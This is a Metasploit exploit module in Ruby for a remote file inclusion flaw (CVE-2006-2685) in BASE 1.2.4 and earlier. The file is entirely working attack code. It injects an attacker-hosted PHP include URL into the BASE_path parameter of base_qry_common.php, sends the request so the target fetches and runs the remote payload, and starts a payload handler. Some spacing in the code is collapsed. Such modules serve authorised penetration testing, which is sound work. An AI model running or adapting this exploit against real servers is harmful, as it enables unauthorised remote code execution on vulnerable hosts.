### $Id: base_qry_common.rb 11127 2010-11-24 19:35:38Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'classMetasploit3< Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
definitialize(info ={})super(update_info(info,'Name'=>'BASE base_qry_common Remote File Include','Description'=>%q{
This module exploits a remote file inclusion vulnerability in
the base_qry_common.php filein BASE 1.2.4and earlier.},'Author'=>['MC'],'License'=> MSF_LICENSE,'Version'=>'$Revision: 11127 $','References'=>[['CVE','2006-2685'],['OSVDB','49366'],['BID','18298'],],'Privileged'=> false,'Payload'=>{'DisableNops'=> true,'Compat'=>{'ConnectionType'=>'find',},'Space'=>32768,},'Platform'=>'php','Arch'=> ARCH_PHP,'Targets'=>[['Automatic',{}]],'DisclosureDate'=>'Jun 14 2008','DefaultTarget'=>0))
register_options([
OptString.new('PHPURI',[true,"The URI to request, with the include parameter changed to !URL!","/base/base_qry_common.php?BASE_path=!URL!"]),], self.class)
end
def php_exploit
timeout =0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url,"%"))
print_status("Trying uri #{uri}")
response = send_request_raw({'global'=> true,'uri'=> uri,},timeout)if response and response.code !=200
print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end
